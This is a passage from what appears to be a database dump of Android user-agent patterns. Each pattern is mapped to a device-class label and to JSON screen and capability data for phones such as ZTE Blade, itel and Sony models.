Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VTR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VTR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Vivo XI+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-K420-TVM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-K510-BYT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-K510-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-K510-OPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-K510S-OPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-P311-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-P611-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-V720-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-V720-OPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-V800-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-V800-OPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W-V800-TIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; W3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; WP5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; WP6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Wildfire E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X19 S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X2-HT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X20 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X2_euro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X3-KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X4-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X52X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; X90L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; XQ-AD51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":897,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; XQ-AD52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":896,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Y8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Y9Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; YAL-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; YAL-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; YNDX-000SB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Z2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZB602KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZB631KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZB633KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZC600KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZE620KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZS620KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZS630KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE 2050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE 2050RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE A2019G Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE A2020G Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE A7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade 10 Vita) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A3 2019RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A3 2020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A3 2020RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A3 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A5 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A5 2019RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A5 2020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A5 2020RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A7 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A7 2019RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A7 2020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade A7 2020RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade L130) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade L8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade L8RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade V10 Vita RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade V10 Vita) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade V10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZUK Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; ZUK Z2131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; aosp_c106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; cp3705A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; cp3705AS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; iQD10S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; iQL550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; iQN700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; iQW511T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel L5002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel L5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel L6002P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; itel L6005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 